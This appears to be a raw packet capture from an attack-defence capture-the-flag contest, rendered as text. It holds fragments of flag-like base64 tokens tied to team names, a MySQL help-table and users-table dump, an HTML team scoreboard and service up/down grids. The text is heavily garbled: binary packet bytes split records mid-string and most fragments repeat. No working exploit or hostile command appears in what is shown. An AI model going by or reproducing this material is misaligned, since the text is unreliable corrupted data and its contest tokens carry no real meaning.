63C290EC0CB04FC0C888C314AEBE33CF,ucsb,MTNzEwwDACPYVaQ5eLgF3XjVn8Qa8pMchtzb1w==
40C0A5319053A191029761630D7886F6,ucsb,MTNzEwwDACgEO+RAW70pjbXmpK0FISSrkeGTEQ==
95C65F4758914435B36A9F365864F307,ucsb,MTNzEwwDACljTna1du7/Mx4AqturS/z0WIewHQ==
A15FCC2D4F4223036DA7ACA183DF5743,ucsb,MTNzEwwDACpHK/7xwuTF46xBuH98uowpGST3AQ==
7EB052A5A86C20DB469299AEAA1C0867,ucsb,MTNzEwwDACvu4/zk3vLkgGn6+mxrc4wVXciQMg==
110568F801060D40C6B00DA67C1A7A41,ucsb,MTNzEwwDACxCv+AHvU0HMAOvRAHfWoyuVhgNWQ==
110568F801060D40C6B00DA67C1A7A41,inet,We0wnYou
23472D76CC4D5587702472416B40FC8F,ucsb,MTNzEwwDAC2i2RGFe4S7nfdER7tTsrw6yPfvXw==
23472D76CC4D5587702472416B40FC8F,inet,We0wnYou
E38F0A5182388C5A60B7D2F30C6EDECF,ucsb,MTNzEwwDAC6hu+wMICWLpIje9YegULUI9FaUrA==
E38F0A5182388C5A60B7D2F30C6EDECF,inet,We0wnYou
8BE139C22639E9576201FD85E344E6C7,ucsb,MTNzEwwDAC8SCTcOPSknF8naBiUWc+KUJaz7BQ==
8BE139C22639E9576201FD85E344E6C7,inet,We0wnYou
2CB2192A98BCB9F13511154ECA3DD1DE,ucsb,MTNzEwwDADBwiVFuAapxc0TiE3oBBAAeL0Rn+Q==
2CB2192A98BCB9F13511154ECA3DD1DE,inet,WeCebb0`BiET@/o0AEA5B383F5B157646F8DAFB5E7FE067082,ucsb,MTNzEwwDACHxsB9IICgcR0ySx58C/2KcTgTL7g==
8EFC8584FBA34A869213C7C5BE906FE9,ucsb,MTNzEwwDACJxw2rB8P5+kYCGyEWTixUS2fI2BQ==
63C290EC0CB04FC0C888C314AEBE33CF,ucsb,MTNzEwwDACPYVaQ5eLgF3XjVn8Qa8pMchtzb1w==
40C0A5319053A191029761630D7886F6,ucsb,MTNzEwwDACgEO+RAW70pjbXmpK0FISSrkeGTEQ==
95C65F4758914435B36A9F365864F307,ucsb,MTNzEwwDACljTna1du7/Mx4AqturS/z0WIewHQ==
A15FCC2D4F4223036DA7ACA183DF5743,ucsb,MTNzEwwDACpHK/7xwuTF46xBuH98uowpGST3AQ==
7EB052A5A86C20DB469299AEAA1C0867,ucsb,MTNzEwwDACvu4/zk3vLkgGn6+mxrc4wVXciQMg==
110568F801060D40C6B00DA67C1A7A41,ucsb,MTNzEwwDACxCv+AHvU0HMAOvRAHfWoyuVhgNWQ==
110568F801060D40C6B00DA67C1A7A41,inet,We0wnYou
23472D76CC4D5587702472416B40FC8F,ucsb,MTNzEwwDAC2i2RGFe4S7nfdER7tTsrw6yPfvXw==
23472D76CC4D5587702472416B40FC8F,inet,We0wnYou
E38F0A5182388C5A60B7D2F30C6EDECF,ucsb,MTNzEwwDAC6hu+wMICWLpIje9YegULUI9FaUrA==
E38F0A5182388C5A60B7D2F30C6EDECF,inet,We0wnYou
8BE139C22639E9576201FD85E344E6C7,ucsb,MTNzEwwDAC8SCTcOPSknF8naBiUWc+KUJaz7BQ==
8BE139C22639E9576201FD85E344E6C7,inet,We0wnYou
2CB2192A98BCB9F13511154ECA3DD1DE,ucsb,MTNzEwwDADBwiVFuAapxc0TiE3oBBAAeL0Rn+Q==
2CB2192A98BCB9F13511154ECA3DD1DE,inet,WeCAfbbBi0`ET@/Klo0E65353D86A285DCC96186D56CFE108EB1,ucsb,MTNzEwwDADG+hLneMMWxetaoGeMr30i02UnWAA==
65353D86A285DCC96186D56CFE108EB1,inet,We0wnYou
D452CF601989C9658248F687A126BAB3,ucsb,MTNzEwwDADLKrdn6+821tPmLtjY2fYkMzE9oTw==
D452CF601989C9658248F687A126BAB3,inet,We0wnYou
49AD46A0262C1F822AF81C15D094E702,ucsb,MTNzEwwDADOL/4enwd4XcjI0ZZ8qvrH+fwj7Hg==
49AD46A0262C1F822AF81C15D094E702,inet,We0wnYou
10846407650061C96214803628867957,ucsb,MTNzEwwDADT072hKJAKpja6NaPf3Wcm3QsmByw==
10846407650061C96214803628867957,inet,We0wnYou
0B4BA372DBEA9AE1E9CA80EFAF90AFD0,ucsb,MTNzEwwDADVFwd0MFtc2LGD36ZuiURw5wrpj7Q==
0B4BA372DBEA9AE1E9CA80EFAF90AFD0,inet,We0wnYou
F259EFD516ADAAB675829D91073F9512,ucsb,MTNzEwwDADYNKW5dEuYxukhlUJiqbudXgFJWKw==
F259EFD516ADAAB675829D91073F9512,inet,We0wnYou
529C45170CB42CB08892C7168DEC5EB2,ucsb,MTNzEwwDADe7IiSEnZFHxTWp+DlwLyeqrtT6qQ==
529C45170CB42CB08892C7168DEC5EB2,inet,We0wnYou
5D251F36E70B56E43DE9BCE399B7472F,ucsb,MTNzEwwDADg7KbHCr2wMz+X2GA01m9YzlhsGcQ==
5D251F36E70B56E43DE9BCE399B7472F,inet,We0wnYou
E4077B6875353E8F9255501BC90142F4,ucsb,MTNzEwwDADlJv6CjLQq0WaG+cxs/8Wbwf65cjw==
E4077B6875353E8F9255501BC90142F4,inet,We0wnYou
517F4A38D008D463428EF367E464BBEA,ucsb,MTNzEwwDADrficbRY7R7/+XPJaL2KTbvGCHf``Bi0`ER@/Nlo0E:O@?  PrXhq $T ycthUfmg==
517F4A38D008D463428EF367E464BBEA,inet,We0wnYou
49DE6790F9D94DA6F92CFC81AEB5D693,ucsb,MTNzEwwDADsKieJKfOrrXfaFMMHaDVRRSucF3Q==
49DE6790F9D94DA6F92CFC81AEB5D693,inet,We0wnYou
1,2,3
8A253CC866D43BCB72D323AAA3684A73,ucsb,MTNzEwwDADzyan8Tnh0eBxuA0mvHgJGZqTNsAQ==
8A253CC866D43BCB72D323AAA3684A73,inet,We0wnYou
1,2,3
174FBB5DC69EFA9B39952BA009015750,ucsb,MTNzEwwDAD0soK3xYg8sC6mxBjkC3D6bYVeE+A==
174FBB5DC69EFA9B39952BA009015750,inet,We0wnYou

0 CWfbb0`BiET@/o0AE65353D86A285DCC96186D56CFE108EB1,ucsb,MTNzEwwDADG+hLneMMWxetaoGeMr30i02UnWAA==
65353D86A285DCC96186D56CFE108EB1,inet,We0wnYou
D452CF601989C9658248F687A126BAB3,ucsb,MTNzEwwDADLKrdn6+821tPmLtjY2fYkMzE9oTw==
D452CF601989C9658248F687A126BAB3,inet,We0wnYou
49AD46A0262C1F822AF81C15D094E702,ucsb,MTNzEwwDADOL/4enwd4XcjI0ZZ8qvrH+fwj7Hg==
49AD46A0262C1F822AF81C15D094E702,inet,We0wnYou
10846407650061C96214803628867957,ucsb,MTNzEwwDADT072hKJAKpja6NaPf3Wcm3QsmByw==
10846407650061C96214803628867957,inet,We0wnYou
0B4BA372DBEA9AE1E9CA80EFAF90AFD0,ucsb,MTNzEwwDADVFwd0MFtc2LGD36ZuiURw5wrpj7Q==
0B4BA372DBEA9AE1E9CA80EFAF90AFD0,inet,We0wnYou
F259EFD516ADAAB675829D91073F9512,ucsb,MTNzEwwDADYNKW5dEuYxukhlUJiqbudXgFJWKw==
F259EFD516ADAAB675829D91073F9512,inet,We0wnYou
529C45170CB42CB08892C7168DEC5EB2,ucsb,MTNzEwwDADe7IiSEnZFHxTWp+DlwLyeqrtT6qQ==
529C45170CB42CB08892C7168DEC5EB2,inet,We0wnYou
5D251F36E70B56E43DE9BCE399B7472F,ucsb,MTNzEwwDADg7KbHCr2wMz+X2GA01m9YzlhsGcQ==
5D251F36E70B56E43DE9BCE399B7472F,inet,We0wnYou
E4077B6875353E8F9255501BC90142F4,ucsb,MTNzEwwDADlJv6CjLQq0WaG+cxs/8Wbwf65cjw==
E4077B6875353E8F9255501BC90142F4,inet,We0wnYou
517F4A38D008D463428EF367E464BBEA,ucsb,MTNzEwwDADrficbRY7R7/+XPJaL2KTbvGCbf``0`BiER@/o0AE:O@@  PrXhq $T ycthUfmg==
517F4A38D008D463428EF367E464BBEA,inet,We0wnYou
49DE6790F9D94DA6F92CFC81AEB5D693,ucsb,MTNzEwwDADsKieJKfOrrXfaFMMHaDVRRSucF3Q==
49DE6790F9D94DA6F92CFC81AEB5D693,inet,We0wnYou
1,2,3
8A253CC866D43BCB72D323AAA3684A73,ucsb,MTNzEwwDADzyan8Tnh0eBxuA0mvHgJGZqTNsAQ==
8A253CC866D43BCB72D323AAA3684A73,inet,We0wnYou
1,2,3
174FBB5DC69EFA9B39952BA009015750,ucsb,MTNzEwwDAD0soK3xYg8sC6mxBjkC3D6bYVeE+A==
174FBB5DC69EFA9B39952BA009015750,inet,We0wnYou

0 CgbbBi0`ET@/p܂Ao0E<@?Lb  3PW{qtڀ  (';\n -> 0\nmysql> SELECT \'a\' = \'a \';\n -> 1\nmysql> SELECT BINARY \'a\' = \'a \';\n -> 0',''),(234,'MBROVERLAPS',8,' MBROverlaps(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 overlap.\n','',''),(235,'SOUNDEX',23,' SOUNDEX(str)\nReturns a soundex string from str. Two strings that sound almost the\nsame should have identical soundex strings. A standard soundex string\nis four characters long, but the SOUNDEX() function returns an\narbitrarily long string. You can use SUBSTRING() on the result to get\na standard soundex string. All non-alphabetic characters are ignored in the\ngiven string. All international alphabetic characters outside the A-Z range\nare treated as vowels.\n','mysql> SELECT SOUNDEX(\'Hello\');\n -> \'H400\'\nmysql> SELECT SOUNDEX(\'Quadratically\');\n -> \'Q36324\'',''),(236,'SHOW MASTER LOGS',6,'SHOW MASTER LOGS\nSHOW BINARY LOGS\n\nLists the binary log files on the server. This statement is used as part of\nthe procedure described in [PURGE MASTER LOGS, , PURGE MASTER LOGS]\nfor determining which logs can be purged.\n\nmysql> SHOW BINARY LOGS;\n+---------------+-----------+\n| Log_name | File_size |\n+---------------+-----------+\n| CgZZBi0`EL@/Ao0E4=@?  PXhqD&"v cyCgbb0`BiET@/Ԁo0SE<@@Kb  3PW{qtڀ  (';\n -> 0\nmysql> SELECT \'a\' = \'a \';\n -> 1\nmysql> SELECT BINARY \'a\' = \'a \';\n -> 0',''),(234,'MBROVERLAPS',8,' MBROverlaps(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 overlap.\n','',''),(235,'SOUNDEX',23,' SOUNDEX(str)\nReturns a soundex string from str. Two strings that sound almost the\nsame should have identical soundex strings. A standard soundex string\nis four characters long, but the SOUNDEX() function returns an\narbitrarily long string. You can use SUBSTRING() on the result to get\na standard soundex string. All non-alphabetic characters are ignored in the\ngiven string. All international alphabetic characters outside the A-Z range\nare treated as vowels.\n','mysql> SELECT SOUNDEX(\'Hello\');\n -> \'H400\'\nmysql> SELECT SOUNDEX(\'Quadratically\');\n -> \'Q36324\'',''),(236,'SHOW MASTER LOGS',6,'SHOW MASTER LOGS\nSHOW BINARY LOGS\n\nLists the binary log files on the server. This statement is used as part of\nthe procedure described in [PURGE MASTER LOGS, , PURGE MASTER LOGS]\nfor determining which logs can be purged.\n\nmysql> SHOW BINARY LOGS;\n+---------------+-----------+\n| Log_name | File_size |\n+---------------+-----------+\n| CgZZ0`BiEL@/Eo0lE4=@@  PXhqD&"v cyCgkkBiʪE]@/o0oo0EE|j@@ YP+$l1^ 7=wG.HTTP/1.0 200 OK CgkkBaBiE]@/Uo0o0 EE|j@@ YP+$l1^ 7=wG.HTTP/1.0 200 OK CjbbBiʪET@/o0oo0E<|l@@ YP*+$ll} 7=wG.ContentType: text/html CTF Scoreboard CTF Scoreboard
Total ScoreTrend Score Offensive ScoreDefensive ScorePenaltyScore
We_0wn_Y0u 38077 17561 25107 12970 0
0ld Eur0pe 31145 15619 19840 11305 0
Chocolate Makers 30441 20708 29031 1410 0
The Tower of Hanoi 28817 20270 22337 6480 0
Wizards of DoS 24744 11446 14139 10605 0
f0gd0gs 12535 5088 100 12435 0
The Graham Crackers 12370 5059 0 12370 0
int80 12055 4971 0 12055 0
Miner's Threat 11955 4926 0 11955 0
SIGMIL 10596 4948
561
Total ScoreTrend Score Offensive ScoreDefensive ScorePenaltyScore
We_0wn_Y0u 38077 17561 25107 12970 0
0ld Eur0pe 31145 15619 19840 11305 0
Chocolate Makers 30441 20708 29031 1410 0
The Tower of Hanoi 28817 20270 22337 6480 0
Wizards of DoS 24744 11446 14139 10605 0
f0gd0gs 12535 5088 100 12435 0
The Graham Crackers 12370 5059 0 12370 0
int80 12055 4971 0 12055 0
Miner's Threat 11955 4926 0 11955 0
SIGMIL 10596 4948 10035 0
Alpha 10355 4458 365 9990 0
Cheddar Horsemen 10150 4960 300 9850 0
Omega 10030 4311 0 10030 0
WCSC 9600 4334 450 9150 0
W0lfhac|<3r5 8998 4538 493 8505 0
Brooklyn Overflow 8962 4277 3062 5900 0
Felons of Troy 2735 1842 0 2735 0
SYPER 2620 1729 0 2620 0
s14ck3rs 2570 1723 0 2570 0
U C Lions 2125 1481 895 1230 0
Team Georgia Tech World Police 1870 1100 0 1870 0
Cult of the Living Dead 700 150 0 700 0


ftpd museum acquire561 10035 0
Alpha 10355 4458 365 9990 0
Cheddar Horsemen 10150 4960 300 9850 0
Omega 10030 4311 0 10030 0
WCSC 9600 4334 450 9150 0
W0lfhac|<3r5 8998 4538 493 8505 0
Brooklyn Overflow 8962 4277 3062 5900 0
Felons of Troy 2735 1842 0 2735 0
SYPER 2620 1729 0 2620 0
s14ck3rs 2570 1723 0 2570 0
U C Lions 2125 1481 895 1230 0
Team Georgia Tech World Police 1870 1100 0 1870 0
Cult of the Living Dead 700 150 0 700 0


up up wrong_flag CbbBaBiET@/^o0o0 E<|x@@ YP'2+$lB 7=wG3> CNNBiʪE@@/#o0oo0E(|z@@ YP,:+$l R 7=wG3
ftpd museum acquire 100;',''),(239,'VARBINARY',1,' VARBINARY(M)\n\nThe VARBINARY type is similar to the VARCHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(240,'LOAD INDEX',6,'The LOAD INDEX INTO CACHE statement preloads a table index into the\nkey cache to which it has been assigned by an explicit CACHE INDEX\nstatement, or into the default key cache otherwise. LOAD INDEX INTO\nCACHE is used only for MyISAM tables.\n\nThe IGNORE LEAVES modifier causes only blocks for the non-leaf\nnodes of the index to be preloaded.\n','LOAD INDEX INTO CACHE\n tblC.lbb0`BiET@/Ԁo0SE<@@Ka  3PWytڀ Ui (binlog.000015 | 724935 |\n| binlog.000016 | 733481 |\n+---------------+-----------+\n','',''),(237,'MBRTOUCHES',8,' MBRTouches(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 touch.\n','',''),(238,'INSERT SELECT',6,'INSERT [LOW_PRIORITY | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name [(col_name,...)]\n SELECT ...\n [ ON DUPLICATE KEY UPDATE col_name=expr, ... ]\n\nWith INSERT ... SELECT, you can quickly insert many rows\ninto a table from one or many tables.\n','INSERT INTO tbl_temp2 (fld_id)\n SELECT tbl_temp1.fld_order_id\n FROM tbl_temp1 WHERE tbl_temp1.fld_order_id > 100;',''),(239,'VARBINARY',1,' VARBINARY(M)\n\nThe VARBINARY type is similar to the VARCHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(240,'LOAD INDEX',6,'The LOAD INDEX INTO CACHE statement preloads a table index into the\nkey cache to which it has been assigned by an explicit CACHE INDEX\nstatement, or into the default key cache otherwise. LOAD INDEX INTO\nCACHE is used only for MyISAM tables.\n\nThe IGNORE LEAVES modifier causes only blocks for the non-leaf\nnodes of the index to be preloaded.\n','LOAD INDEX INTO CACHE\n tblCmZZBiBaEL@/fo0 o0E4@)} Y P+$l28 G37=wCmZZBiBaEL@/fo0 o0E4@){ Y P+$l:  G37=wCmZZʪBiEL@/o0o0oE4@@} Y P+$l28 G37=wCmZZʪBiEL@/o0o0oE4@@{ Y P+$l:  G37=wC obbBiʪET@/o0oo0E<|p@@ YP:+$lN 7=wG3th> spammerd spamagent spamdb spamin-spamout hall of shame contribute spamgentropticon 5000 spambook spamometer spamasm
1 - Alpha down up wrong_flag 18,9 up up up 9 down down wrong_flag up up up up
2 - Omega down down 9 down 18 up down down 9 up up down down down up up
3 - s14ck3rs down up 8 up 18 up up up 9 up up 18,7 up 18,1,11,9,4 up up up up
4 - Wizards of DoS down up wrong_flag up up up 9 up up up 11,7 up down up down
5 - Miner's Threat down up 7,9,8 wrong_flag 18 up up up 9 up down up 18,4 up up down
6 - SIGMIL up down down up up up up up wrong_flag up up up C obbBaBiET@/^o0o0 E<|p@@ YP:+$lN 7=wG3th> spammerd spamagent spamdb spamin-spamout hall of shame contribute spamgentropticon 5000 spambook spamometer spamasm
1 - Alpha down up wrong_flag 18,9 up up up 9 down down wrong_flag up up up up
2 - Omega down down 9 down 18 up down down 9 up up down down down up up
3 - s14ck3rs down up 8 up 18 up up up 9 up up 18,7 up 18,1,11,9,4 up up up up
4 - Wizards of DoS down up wrong_flag up up up 9 up up up 11,7 up down up down
5 - Miner's Threat down up 7,9,8 wrong_flag 18 up up up 9 up down up 18,4 up up down
6 - SIGMIL up down down up up up up up wrong_flag up up up CpbbBi0`ET@/p܂Ao0E<@?L`  3PWtڀ 0 (_index_list [, tbl_index_list] ...\n\ntbl_index_list:\n tbl_name\n [[INDEX|KEY] (index_name[, index_name] ...)]\n [IGNORE LEAVES]',''),(241,'UNION',6,'UNION is used to combine the result from many SELECT\nstatements into one result set. UNION is available from MySQL 4.0.0\non.\n\nSelected columns listed in corresponding positions of each SELECT\nstatement should have the same type. (For example, the first column selected\nby the first statement should have the same type as the first column selected\nby the other statements.) The column names used in\nthe first SELECT statement are used as the column names for the\nresults returned.\n','SELECT ...\nUNION [ALL | DISTINCT]\nSELECT ...\n [UNION [ALL | DISTINCT]\n SELECT ...]',''),(242,'TO_DAYS',14,' TO_DAYS(date)\nGiven a date date, returns a daynumber (the number of days since year\n0).\n','mysql> SELECT TO_DAYS(950501);\n -> 728779\nmysql> SELECT TO_DAYS(\'1997-10-07\');\n -> 729669',''),(243,'NOT REGEXP',23,' expr NOT REGEXP pat\n expr NOT RLIKE pat\n\nThis is the same as NOT (expr REGEXP pat).\n','',''),(244,'NOT IN',26,' expr NOT IN (value,...)\nThis is the same as NOT (expr IN (value,...)).\n','',''),(245,'!',20,' NOT\n !\nLogical NOT.\nEvaluates to 1 if the operand is 0,\nto 0 iCpbb0`BiET@/Ԁo0SE<@@K`  3PWtڀ 0 (_index_list [, tbl_index_list] ...\n\ntbl_index_list:\n tbl_name\n [[INDEX|KEY] (index_name[, index_name] ...)]\n [IGNORE LEAVES]',''),(241,'UNION',6,'UNION is used to combine the result from many SELECT\nstatements into one result set. UNION is available from MySQL 4.0.0\non.\n\nSelected columns listed in corresponding positions of each SELECT\nstatement should have the same type. (For example, the first column selected\nby the first statement should have the same type as the first column selected\nby the other statements.) The column names used in\nthe first SELECT statement are used as the column names for the\nresults returned.\n','SELECT ...\nUNION [ALL | DISTINCT]\nSELECT ...\n [UNION [ALL | DISTINCT]\n SELECT ...]',''),(242,'TO_DAYS',14,' TO_DAYS(date)\nGiven a date date, returns a daynumber (the number of days since year\n0).\n','mysql> SELECT TO_DAYS(950501);\n -> 728779\nmysql> SELECT TO_DAYS(\'1997-10-07\');\n -> 729669',''),(243,'NOT REGEXP',23,' expr NOT REGEXP pat\n expr NOT RLIKE pat\n\nThis is the same as NOT (expr REGEXP pat).\n','',''),(244,'NOT IN',26,' expr NOT IN (value,...)\nThis is the same as NOT (expr IN (value,...)).\n','',''),(245,'!',20,' NOT\n !\nLogical NOT.\nEvaluates to 1 if the operand is 0,\nto 0 iCqZZBiBaEL@/fo0 o0E4@)y Y P+$lB @l G37=wCqZZBiBaEL@/fo0 o0E4@)w Y P+$l* @Մ G37=wC rZZʪBiEL@/o0o0oE4@@y Y P+$lB @l G37=wCrZZʪBiEL@/o0o0oE4@@w Y P+$l* @Մ G37=wCrZZBi0`EL@/܂Sŀo0E4\@?b 3 Pu}U8$ )CsZZ0`BiEL@/go0AE4\@@b 3 Pu}U8$ )CtbbBi0`ET@/p܂Ao0E<@?L_  3PWtڀ ( (f the operand is non-zero,\nand NOT NULL returns NULL.\n','mysql> SELECT NOT 10;\n -> 0\nmysql> SELECT NOT 0;\n -> 1\nmysql> SELECT NOT NULL;\n -> NULL\nmysql> SELECT ! (1+1);\n -> 0\nmysql> SELECT ! 1+1;\n -> 1',''),(246,'TEXT TYPE',1,' TEXT[(M)]\n\nA TEXT column with a maximum length of 65,535\n(2^16 - 1) characters.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest TEXT type largest\nenough to hold values M characters long.\n','',''),(247,'DOUBLE',1,' DOUBLE[(M,B)] [UNSIGNED] [ZEROFILL]\n\nA normal-size (double-precision) floating-point number. Allowable values are\n-1.7976931348623157E+308 to -2.2250738585072014E-308,\n0, and 2.2250738585072014E-308 to 1.7976931348623157E+308.\nIf UNSIGNED is specified, negative values are disallowed. M is the\ndisplay width and B is the number of bits of precision. DOUBLE\nwithout arguments or FLOAT(p) (where p is in the range from\n25 to 53) stands for a double-precision floating-point number. A\nsingle-precision floating-point number is accurate to approximately 7 decimal\nplaces; a double-precision floating-point number is accurate to approximately 15\ndecimal places.\n\n DOUBLE PRECISION[(M,D)] [UNSIGNED] [ZEROFILL]\n REAL[(CtZZBi0`EL@/Ao0E4@?  ֞Pg%6"ld  cmPCtbb0`BiET@/Ԁo0SE<@@K_  3PWtڀ ( (f the operand is non-zero,\nand NOT NULL returns NULL.\n','mysql> SELECT NOT 10;\n -> 0\nmysql> SELECT NOT 0;\n -> 1\nmysql> SELECT NOT NULL;\n -> NULL\nmysql> SELECT ! (1+1);\n -> 0\nmysql> SELECT ! 1+1;\n -> 1',''),(246,'TEXT TYPE',1,' TEXT[(M)]\n\nA TEXT column with a maximum length of 65,535\n(2^16 - 1) characters.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest TEXT type largest\nenough to hold values M characters long.\n','',''),(247,'DOUBLE',1,' DOUBLE[(M,B)] [UNSIGNED] [ZEROFILL]\n\nA normal-size (double-precision) floating-point number. Allowable values are\n-1.7976931348623157E+308 to -2.2250738585072014E-308,\n0, and 2.2250738585072014E-308 to 1.7976931348623157E+308.\nIf UNSIGNED is specified, negative values are disallowed. M is the\ndisplay width and B is the number of bits of precision. DOUBLE\nwithout arguments or FLOAT(p) (where p is in the range from\n25 to 53) stands for a double-precision floating-point number. A\nsingle-precision floating-point number is accurate to approximately 7 decimal\nplaces; a double-precision floating-point number is accurate to approximately 15\ndecimal places.\n\n DOUBLE PRECISION[(M,D)] [UNSIGNED] [ZEROFILL]\n REAL[(CuZZ0`BiEL@/o0˃2E4@@  ֞Pg%6"ld  cmPCIybbBi0`ET@/p܂Ao0E<@?x  3Pwtj ] (=='),(212,'alncgb','MTNzEwEIABThHerXg6GSizIqIWelQ81d9QHGAg=='),(213,'qlxnab','MTNzEw0IADJJM7XJRPSlQJrWUtP+qzt7Jm7jmQ=='),(214,'oqndfe','MTNzEw0IADM7cyloeuuwuzC1S7k/nAXG94t1Og=='),(215,'fmmtwp','MTNzEw0IADR23PMllMFf5IwWT5mLhZ5MLt76qA=='),(216,'uvmejz','MTNzEw0IADWXZqtpZ4CZRdjG/7wtVTHn8KDY5g=='),(217,'xqbebs','MTNzEw0IADaet0TFqK4dK4KStQ4FHm4NKamUuw=='),(218,'xfttvk','MTNzEw0IADcXTbFhgRZzDvuhPCAtZ6k/6rQbIQ=='),(219,'nuqaom','MTNzEw0IADhSNZgRjfvdK8hSJjz40OvSpegY/A=='),(220,'mjdpzm','MTNzEw0IADkcrPAQdgfVix62flgEURS/SaCLvQ=='),(221,'emlwsn','MTNzEw0IADqtOZRTaNDRMzO0mfX7A2kel3WbTg=='),(222,'cqjdbu','MTNzEw0IADsHVrqHnaVfxY2XYSP5UkLvcax89A=='),(223,'pumpyw','MTNzEw0IADw1ZBi0ya0Wq25pO0YT8PWljqoUWw=='),(224,'npsbly','MTNzEw0IAD05Fej5gUP50YgklfvEgwg3jEp1mQ=='); UNLOCK TABLES; /*!40000 ALTER TABLE `users` ENABLE KEYS */; -- -- Current Database: `del` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `del` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `del`; -- -- Table structure for table `test` -- DROP TABLE IF EXISTS `test`; CREATE TABLE `test` ( `id` int(32) default NULL, `name` text ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Dumping data for table `test` -- /*!40000 ALTER TABLE `test` DISABLE KEYS */; LOCK TABLES `test` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `testC\ybb0`BiET@/Ԁo0SE<@@w  3Pwtj ] (=='),(212,'alncgb','MTNzEwEIABThHerXg6GSizIqIWelQ81d9QHGAg=='),(213,'qlxnab','MTNzEw0IADJJM7XJRPSlQJrWUtP+qzt7Jm7jmQ=='),(214,'oqndfe','MTNzEw0IADM7cyloeuuwuzC1S7k/nAXG94t1Og=='),(215,'fmmtwp','MTNzEw0IADR23PMllMFf5IwWT5mLhZ5MLt76qA=='),(216,'uvmejz','MTNzEw0IADWXZqtpZ4CZRdjG/7wtVTHn8KDY5g=='),(217,'xqbebs','MTNzEw0IADaet0TFqK4dK4KStQ4FHm4NKamUuw=='),(218,'xfttvk','MTNzEw0IADcXTbFhgRZzDvuhPCAtZ6k/6rQbIQ=='),(219,'nuqaom','MTNzEw0IADhSNZgRjfvdK8hSJjz40OvSpegY/A=='),(220,'mjdpzm','MTNzEw0IADkcrPAQdgfVix62flgEURS/SaCLvQ=='),(221,'emlwsn','MTNzEw0IADqtOZRTaNDRMzO0mfX7A2kel3WbTg=='),(222,'cqjdbu','MTNzEw0IADsHVrqHnaVfxY2XYSP5UkLvcax89A=='),(223,'pumpyw','MTNzEw0IADw1ZBi0ya0Wq25pO0YT8PWljqoUWw=='),(224,'npsbly','MTNzEw0IAD05Fej5gUP50YgklfvEgwg3jEp1mQ=='); UNLOCK TABLES; /*!40000 ALTER TABLE `users` ENABLE KEYS */; -- -- Current Database: `del` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `del` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `del`; -- -- Table structure for table `test` -- DROP TABLE IF EXISTS `test`; CREATE TABLE `test` ( `id` int(32) default NULL, `name` text ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Dumping data for table `test` -- /*!40000 ALTER TABLE `test` DISABLE KEYS */; LOCK TABLES `test` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `testCybbBi0`ET@/أ  o0E<@?j  3PZi+  ^(0VANK87k29MwJQH7At3w==','38013336'),(176673111,'od5Yirm8ODf',5242,'MTNzEwEJAAUA5oFnkzgnkNkq7F0s0L8LV96DyQ==','9326577'),(463685755,'pNyET1r6vzN',641,'MTNzEwEJAAaBPW6A2Oxsz2XOTqlvsOnMHXg2hA==','10114519'),(238615315,'3Mq37E',4022,'MTNzEwEJAAdyOSo3XMc1ITc9ddyFS7UTn12YBg==','16521933'),(285264492,'k0ki7R5g',1093,'MTNzEwEJAAjGdJRTYDiMF/BBFPxz3CP+SA6MTg==','32386250'),(641783464,'yxE89dH',1676,'MTNzEwEJAAnhtsyB3wJSxnuM+ynGzlrSjkDHqw==','38208728'),(949715177,'BVLXgaj75',5314,'MTNzEwEJAArKsRxWWIXBUN2eFWTyNLAWBKW1zQ==','20072295'),(732227231,'0ZlxS4ZU1',3447,'MTNzEwEJAAtYe3c1yxxc72QXnhq+X/kC4Qqhew==','11694143'),(504407636,'p1Ug3Hu',3843,'MTNzEwEJAAwPiXAT/JPanv0mKSxwT2BCI+P0Jg==','17047898'),(404437870,'uLJhGvUkz',3082,'MTNzEwEJAA1sxgv8O57qqGPEt2ajsWM3ebT2Qg==','20153709'),(812644847,'F2TiPf8i',2781,'MTNzEwEJAA5F1O61QQAVaDdm5XNw9OW8WF16nA==','28999081'),(517407076,'1LD8OUm2hif',1156,'MTNzEwEJAA/VO/37pWQ8O4ZYFQHeeYnB8ZE0QA==','16648123'),(441023104,'MdtY0SI0D',265,'MTNzEwEJABDFtjAemjoL5OhClSvHAdnFiHFQ4w==','33392972'),(274594953,'ARdKK38epQ',2516,'MTNzEwEJABFB6yQOxW9Ii0BuqNopAClTlwo2Tg==','28592321'),(537787396,'WlJ5hgG',2071,'MTNzEwEJABL3Jl1LJdstdnlbQAL+WEoDLKAJVw==','11093054'),(472272483,'1fATwckq36',1981,'MTNzEwEJABNNV6v6PDzfODq1nrYXnirCL2wCqA==','9159069'),(276522540,'iFCyZZBi0`EL@/Ao0E4@?  ֞Pg%;"l_ cmPCyZZBi0`EL@/܂Sŀo0E4\@?` 3 Pu}UB$ )Cybb0`BiET@/Ԁo0SE<@@i  3PZi+  